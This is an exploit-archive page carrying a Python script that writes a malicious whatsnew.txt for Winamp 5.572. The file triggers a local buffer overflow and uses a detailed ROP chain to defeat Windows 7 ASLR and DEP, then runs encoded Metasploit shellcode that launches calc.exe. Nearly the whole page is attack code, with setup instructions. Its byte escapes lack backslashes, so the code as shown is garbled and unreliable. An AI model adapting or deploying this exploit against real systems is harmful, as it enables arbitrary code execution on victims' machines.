Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)
# Published : 2010-06-26
# Author : Node
# Previous Title : BlazeDVD v6.0 Buffer Overflow Exploit (Meta)
# Next Title : FieldNotes 32 v5.0 Buffer Overflow (SEH)
#!/usr/bin/python

#Exploit Title: 	Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)
#Date: 			June 26, 2010
#Author:		Node
#Software Link:		http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe
#Tested on: 		Windows 7 Ultimate x64 ENG
#Badchars: 		'x00xffx5cx2fx0ax0dx20'
#Instructions: Replace generated whatsnew.txt with original in Winamp folder, Start Winamp, rightclick the flash symbol, "Nullsoft Winamp...", Version history


print "[+] Winamp_5.572_whatsnew.txt Win7 ASLR and DEP Bypass - by Node"

version = "Winamp 5.572"

rop = "A" * 540          # Offset
rop += "x8ax35x84x07" #0x0784358A :  # PUSH ESP # POP ESI # RETN       [Module : in_wm.dll]
rop += "A"*16
rop += "x8ax3dx14x07" #0x07143D8A :  # PUSH ESI # SUB AL,5E # XOR EAX,EAX # POP EBP # RETN     [Module: zlib.dll]
rop += "xf7xb8x40x07" #0x0740B8F7 :  # XCHG EAX,EBP # RETN     [Module : gen_ff.dll]
rop += "xd6x5ex65x07" #0x07655ED6 :  # ADD ESP,30 # RETN       [Module : in_cdda.dll]
rop += "0000" #VirtualProtect placeholder
rop += "DDDD" #return address placeholder
rop += "1111" #lpAddress placeholder
rop += "2222" #dwsize placeholder
rop += "3333" #flNewProtect placeholder
rop += "x60xf6x78x07" # lpflOldProtect (0x0778f660 writable address in in_mp3.dll) 
rop += "A"*24
#---------------Grab a kernel32 pointer from the stack--------------------
rop += "x74x6cx96x07" #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
rop += "x1ax10x09x07" #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "x3axd8x8dx07"*4 #0x078DD83A :  # ADD EAX,41 # RETN       [Module : ml_disc.dll]
rop += "x67x40x5bx07" #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "x65x72x0ax07" #0x070A7265 :  # ADD EAX,ECX # RETN      [Module : libsndfile.dll]
rop += "x67x40x5bx07" #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "x65x72x0ax07" #0x070A7265 :  # ADD EAX,ECX # RETN      [Module : libsndfile.dll]
rop += "x3axd8x8dx07"*3 #0x078DD83A :  # ADD EAX,41 # RETN       [Module : ml_disc.dll]
rop += "x29x13x09x07"*29 #0x07091329 :  # INC EAX # RETN  [Module : libsndfile.dll]
rop += "x74x6cx96x07" #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
rop += "xb3x6ax6cx07" #0x076C6AB3 :  # SUB EAX,EDX # RETN      [Module : in_flv.dll]
rop += "xa7x41x11x07" #0x071141A7 :  # MOV EAX,DWORD PTR DS:[EAX] # RETN       [Module : tataki.dll]
#----------------------EAX=kernel32, ESI=start----------------------

#---------------Change kernel32 pointer to VirtualProtect()-----------------
rop += "x74x6cx96x07" #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
rop += "x1ax10x09x07" #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "x3axd8x8dx07"*4 #0x078DD83A :  # ADD EAX,41 # RETN       [Module : ml_disc.dll] 104
rop += "x67x40x5bx07" #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "x65x72x0ax07" #0x070A7265 :  # ADD EAX,ECX # RETN      [Module : libsndfile.dll] 208
rop += "x67x40x5bx07" #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "x65x72x0ax07" #0x070A7265 :  # ADD EAX,ECX # RETN      [Module : libsndfile.dll] 410
rop += "x67x40x5bx07" #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "x65x72x0ax07" #0x070A7265 :  # ADD EAX,ECX # RETN      [Module : libsndfile.dll] 820
rop += "x67x40x5bx07" #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "x65x72x0ax07" #0x070A7265 :  # ADD EAX,ECX # RETN      [Module : libsndfile.dll] 1040
rop += "x67x40x5bx07" #0x075B4067 :  # MOV ECX,EAX # MOV EAX,ECX # RETN        [Module : gen_ml.dll]
rop += "x65x72x0ax07" #0x070A7265 :  # ADD EAX,ECX # RETN      [Module : libsndfile.dll] 2080
rop += "x08x13x8dx07" #0x078D1308 :  # SUB EAX,41 # RETN       [Module : ml_disc.dll] 203f
rop += "xc6xd7x8dx07" #0x078DD7C6 :  # SUB EAX,20 # RETN       [Module : ml_disc.dll] 201f
rop += "xecx11x09x07"*4 #0x070911EC :  # DEC EAX # RETN  [Module : libsndfile.dll] 201b
rop += "x74x6cx96x07" #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
rop += "x10x7dx0bx07" #0x070B7D10 :  # ADD EAX,EDX # RETN      [Module : libsndfile.dll]
#---------------EAX=VirtualProtect(), ESI=start-----------------

#-------------Write VirtualProtect() to stack----------------------
rop += "x82x55x40x07"*12 #0x07405582 :  # INC ESI # RETN  [Module : gen_ff.dll]
rop += "x43x5dx6fx07" #0x076F5D43 :  # MOV DWORD PTR DS:[ESI],EAX # RETN       [Module : in_midi.dll]
#---------------EAX=VirtualProtect(),ESI=start+12(VP)-----------


#-------------Write return address----------------------
rop += "xddxb7x3ex07" #0x073EB7DD :  # MOV EAX,ESI # RETN      [Module : gen_ff.dll]
rop += "x74x6cx96x07" #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
rop += "x1ax10x09x07" #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "x45x35x10x08" #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "x45x35x10x08" #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "x45x35x10x08" #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "x10x7dx0bx07" #0x070B7D10 :  # ADD EAX,EDX # RETN      [Module : libsndfile.dll]
rop += "x82x55x40x07"*4 #0x07405582 :  # INC ESI # RETN  [Module : gen_ff.dll]
rop += "x43x5dx6fx07" #0x076F5D43 :  # MOV DWORD PTR DS:[ESI],EAX # RETN       [Module : in_midi.dll]
#------------EAX=start+12+312(shellcode),EDX=start+12(VP),ESI=start+16------------

#-------------Write placeholder 1----------------------
rop += "x82x55x40x07"*4 #0x07405582 :  # INC ESI # RETN  [Module : gen_ff.dll]
rop += "x43x5dx6fx07" #0x076F5D43 :  # MOV DWORD PTR DS:[ESI],EAX # RETN       [Module : in_midi.dll]
#------------EAX=start+12+312(shellcode),EDX=start+12(VP),ESI=start+20------------

#-------------Write placeholder 2----------------------
rop += "x89xb3x34x08" #0x0834B389 :  # XCHG EAX,EBX # RETN     [Module : jnetlib.w5s]
rop += "x1ax10x09x07" #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "x45x35x10x08" #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "x45x35x10x08" #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "x45x35x10x08" #0x08103545 :  # ADD EAX,104 # POP EBP # RETN    [Module : freetype.wac]
rop +="AAAA"
rop += "x82x55x40x07"*4 #0x07405582 :  # INC ESI # RETN  [Module : gen_ff.dll]
rop += "x43x5dx6fx07" #0x076F5D43 :  # MOV DWORD PTR DS:[ESI],EAX # RETN       [Module : in_midi.dll]
#---------EAX = 0x30c(size 780),EBX = shellcode, ESI=start+24(placeholder 2), EDX=start+12(VP)--------------

#-------------Write placeholder 3----------------------
rop += "x1ax10x09x07" #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "x3axd8x8dx07" #0x078DD83A :  # ADD EAX,41 # RETN       [Module : ml_disc.dll]
rop += "xecx11x09x07" #0x070911EC :  # DEC EAX # RETN  [Module : libsndfile.dll]
rop += "x82x55x40x07"*4 #0x07405582 :  # INC ESI # RETN  [Module : gen_ff.dll]
rop += "x43x5dx6fx07" #0x076F5D43 :  # MOV DWORD PTR DS:[ESI],EAX # RETN       [Module : in_midi.dll]
rop += "x74x6cx96x07" #0x07966C74 :  # XCHG EAX,EDX # RETN     [Module : ml_local.dll]
#--------EAX=start+12(VP), EBX=start+12+312(shellcode), ESI=start+28-----------


#----------fix EBP problem after call return----------------
rop += "x89xb3x34x08" #0x0834B389 :  # XCHG EAX,EBX # RETN     [Module : jnetlib.w5s]
rop += "x1ax10x09x07" #0x0709101A :  # XOR EAX,EAX # RETN      [Module : libsndfile.dll]
rop += "xf7xb8x40x07" #0x0740B8F7 :  # XCHG EAX,EBP # RETN     [Module : gen_ff.dll]
rop += "x89xb3x34x08" #0x0834B389 :  # XCHG EAX,EBX # RETN     [Module : jnetlib.w5s]
rop += "x85xe0x09x07" #0x0709E085 :  # ADD EBP,EAX # RETN      [Module : libsndfile.dll]
#---------EAX=vp, EBX=?, EDX=40, ESI=start+28, EBP=vp--------

#----------------go to VirtualProtect()-------------------
rop += "xc1xbbx3cx07" #0x073CBBC1 :  # XCHG EAX,ESP # RETN     [Module : gen_ff.dll]
#------------------------bang!-----------------------------

nops = "x90"*304

# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00xffx5cx2fx0ax0dx20' -t perl
shellcode = ("xbbxd2xaaxfax33x31xc9xb1x33xdbxd3xd9x74x24" +
"xf4x5ex83xc6x04x31x5ex0bx03x5exd9x48x0fxcf" +
"x35x05xf0x30xc5x76x78xd5xf4xa4x1ex9dxa4x78" +
"x54xf3x44xf2x38xe0xdfx76x95x07x68x3cxc3x26" +
"x69xf0xcbxe5xa9x92xb7xf7xfdx74x89x37xf0x75" +
"xcex2axfax24x87x21xa8xd8xacx74x70xd8x62xf3" +
"xc8xa2x07xc4xbcx18x09x15x6cx16x41x8dx07x70" +
"x72xacxc4x62x4exe7x61x50x24xf6xa3xa8xc5xc8" +
"x8bx67xf8xe4x06x79x3cxc2xf8x0cx36x30x85x16" +
"x8dx4ax51x92x10xecx12x04xf1x0cxf7xd3x72x02" +
"xbcx90xddx07x43x74x56x33xc8x7bxb9xb5x8ax5f" +
"x1dx9dx49xc1x04x7bx3cxfex57x23xe1x5ax13xc6" +
"xf6xddx7ex8dx09x6fx05xe8x09x6fx06x5bx61x5e" +
"x8dx34xf6x5fx44x71x08x2axc5xd0x80xf3x9fx60" +
"xcdx03x4axa6xebx87x7fx57x08x97xf5x52x55x1f" +
"xe5x2exc6xcax09x9cxe7xdex69x43x7bx82x43xe6" +
"xfbx21x9cxe2");

trash = "B" * 600

expfile = open('whatsnew.txt','w')
expfile.write(version + rop + nops + shellcode + trash)
print "[+] whatsnew.txt generated."
expfile.close()